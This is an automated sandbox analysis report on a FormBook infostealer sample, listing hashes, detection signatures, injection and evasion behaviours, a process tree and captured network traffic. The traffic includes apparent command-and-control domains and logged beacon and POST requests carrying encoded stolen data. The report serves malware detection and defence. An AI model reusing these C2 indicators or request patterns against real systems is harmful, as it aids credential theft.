Edit tour

Windows Analysis Report
cNDddMAF5u.exe

Overview

General Information

Sample name:	cNDddMAF5u.exe renamed because original name is a hash value
Original sample name:	e9882b5a646f9dd7be8e8f48f15b39e22609789546b7e716b1e38c8354b8fd64.exe
Analysis ID:	1587909
MD5:	caf89165d3dfdde3273cce4deade7db4
SHA1:	89409de660c21df6b496060e42495a5d9346ed96
SHA256:	e9882b5a646f9dd7be8e8f48f15b39e22609789546b7e716b1e38c8354b8fd64
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious RASdial Activity

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

cNDddMAF5u.exe (PID: 3232 cmdline: "C:\Users\user\Desktop\cNDddMAF5u.exe" MD5: CAF89165D3DFDDE3273CCE4DEADE7DB4)

svchost.exe (PID: 6652 cmdline: "C:\Users\user\Desktop\cNDddMAF5u.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

GVXcOVOPuWmumK.exe (PID: 4500 cmdline: "C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

rasdial.exe (PID: 2628 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)

GVXcOVOPuWmumK.exe (PID: 6160 cmdline: "C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 1532 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2581837610.0000000003200000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2585563480.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1703918121.0000000006920000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2585328157.0000000004E70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1701029410.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.2587932076.0000000005510000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1702227169.0000000003F90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2585572364.0000000002E90000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious RASdial Activity

Source: Process started

Author: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe" , ParentImage: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe, ParentProcessId: 4500, ParentProcessName: GVXcOVOPuWmumK.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 2628, ProcessName: rasdial.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\cNDddMAF5u.exe", CommandLine: "C:\Users\user\Desktop\cNDddMAF5u.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\cNDddMAF5u.exe", ParentImage: C:\Users\user\Desktop\cNDddMAF5u.exe, ParentProcessId: 3232, ParentProcessName: cNDddMAF5u.exe, ProcessCommandLine: "C:\Users\user\Desktop\cNDddMAF5u.exe", ProcessId: 6652, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\cNDddMAF5u.exe", CommandLine: "C:\Users\user\Desktop\cNDddMAF5u.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\cNDddMAF5u.exe", ParentImage: C:\Users\user\Desktop\cNDddMAF5u.exe, ParentProcessId: 3232, ParentProcessName: cNDddMAF5u.exe, ProcessCommandLine: "C:\Users\user\Desktop\cNDddMAF5u.exe", ProcessId: 6652, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: cNDddMAF5u.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: cNDddMAF5u.exe	Virustotal: Detection: 65%			Perma Link
Source: cNDddMAF5u.exe	ReversingLabs: Detection: 81%

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2581837610.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2585563480.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1703918121.0000000006920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2585328157.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1701029410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2587932076.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1702227169.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2585572364.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: cNDddMAF5u.exe

Joe Sandbox ML: detected

Source: cNDddMAF5u.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GVXcOVOPuWmumK.exe, 00000005.00000002.2581811705.000000000019E000.00000002.00000001.01000000.00000005.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2581841839.000000000019E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: cNDddMAF5u.exe, 00000001.00000003.1346554237.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cNDddMAF5u.exe, 00000001.00000003.1349050815.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1607996500.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1609929988.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1701357405.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1703817466.0000000005022000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.000000000536E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: rasdial.pdb source: svchost.exe, 00000003.00000003.1668922870.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701441562.0000000003600000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2583970277.0000000001238000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: cNDddMAF5u.exe, 00000001.00000003.1346554237.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cNDddMAF5u.exe, 00000001.00000003.1349050815.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1607996500.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1609929988.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701628281.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000003.1701357405.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1703817466.0000000005022000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2586431111.000000000536E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: rasdial.pdbGCTL source: svchost.exe, 00000003.00000003.1668922870.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1701441562.0000000003600000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2583970277.0000000001238000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.2587246887.00000000057FC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.2583016993.0000000003429000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2586519260.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2002060197.0000000006C3C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.2587246887.00000000057FC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.2583016993.0000000003429000.00000004.00000020.00020000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2586519260.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2002060197.0000000006C3C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_0070DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	1_2_0070DBBE
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006DC2A2 FindFirstFileExW,	1_2_006DC2A2
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_007168EE FindFirstFileW,FindClose,	1_2_007168EE
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_0071698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	1_2_0071698F
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_0070D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_0070D076
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_0070D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_0070D3A9
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_00719642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00719642
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_0071979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0071979D
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_00719B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	1_2_00719B2B
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_00715C97 FindFirstFileW,FindNextFileW,FindClose,	1_2_00715C97
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0321C8D0 FindFirstFileW,FindNextFileW,FindClose,	6_2_0321C8D0

Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4x nop then xor eax, eax		6_2_03209EF0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4x nop then mov ebx, 00000004h		6_2_04FB04DE

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: www.egldfi.xyz

Source: global traffic

TCP traffic: 192.168.2.7:54296 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 130.185.109.77 130.185.109.77
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_0071CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

1_2_0071CE44

Source: global traffic	HTTP traffic detected: GET /vl4d/?zNH=npZPFHp&Ebq4kd=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3iwquLse32UPpx06xoyG1OKfEhnqUlOVcfeYCw/nYg4o8/AZZgvgbyHy HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.75178.clubUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /5onp/?Ebq4kd=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VQ7bztTOkaWbq6GbSDD5gGudwG2s7dN0Aj/drkK6Y9amBXkHtwtBoxSc&zNH=npZPFHp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bcg.servicesUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /bsyy/?zNH=npZPFHp&Ebq4kd=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVsz+Ro0OM8Jd88jKv7OGJqHGxaYpNVHYIOGV13jdXqVR/FDBUfHDkP5ob HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.43kdd.topUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic	HTTP traffic detected: GET /cv1w/?Ebq4kd=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetRqgMb6LfgDY9OvnJHDjkSrllgUtIBAwrRtYgMla7fjjdtGa4rVNLvrP&zNH=npZPFHp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.lgdiamonds.infoUser-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Source: global traffic	DNS traffic detected: DNS query: www.75178.club
Source: global traffic	DNS traffic detected: DNS query: www.bcg.services
Source: global traffic	DNS traffic detected: DNS query: www.egldfi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.betmatchx.online
Source: global traffic	DNS traffic detected: DNS query: www.43kdd.top
Source: global traffic	DNS traffic detected: DNS query: www.lgdiamonds.info
Source: global traffic	DNS traffic detected: DNS query: www.jalan2.online

Source: unknown

HTTP traffic detected: POST /5onp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 219Host: www.bcg.servicesOrigin: http://www.bcg.servicesReferer: http://www.bcg.services/5onp/User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 45 62 71 34 6b 64 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 62 6a 65 49 4f 4d 75 31 77 6e 63 4a 34 52 35 49 2f 78 58 72 6d 79 44 44 38 54 41 2b 6a 65 57 76 38 68 56 50 68 33 76 48 45 64 2b 58 76 51 74 43 38 44 50 4c 6a 47 72 53 51 62 4c 33 54 4f 57 58 4a 34 39 6f 78 52 6b 54 64 53 48 2f 71 76 62 4f 68 73 7a 47 69 37 44 2f 62 42 54 68 79 6b 79 52 6c 6c 6d 62 37 76 78 61 44 55 72 70 74 68 65 4f 57 66 36 4d 52 58 39 7a 74 51 70 50 6f 41 69 36 53 7a 57 48 61 67 62 41 7a 6d 57 6f 6b 6c 6d 53 38 77 79 33 31 4e 51 48 4d 78 4a 2b 66 49 44 34 43 72 6d 51 44 6a 4f 51 70 75 79 4a 4d 59 34 34 6e 52 32 79 4a 55 55 38 46 68 50 72 55 4a 5a 75 38 6e 69 6a 33 67 3d 3d Data Ascii: Ebq4kd=VSFgwmtnFo8YbjeIOMu1wncJ4R5I/xXrmyDD8TA+jeWv8hVPh3vHEd+XvQtC8DPLjGrSQbL3TOWXJ49oxRkTdSH/qvbOhszGi7D/bBThykyRllmb7vxaDUrptheOWf6MRX9ztQpPoAi6SzWHagbAzmWoklmS8wy31NQHMxJ+fID4CrmQDjOQpuyJMY44nR2yJUU8FhPrUJZu8nij3g==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:18:55 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:18:58 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:19:00 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 18:19:03 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 18:19:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T$'gd*HN+I-0D7(bTgU!2S>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Fri, 10 Jan 2025 18:19:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T$'gd*HN+I-0D7(bTgU!2S>0
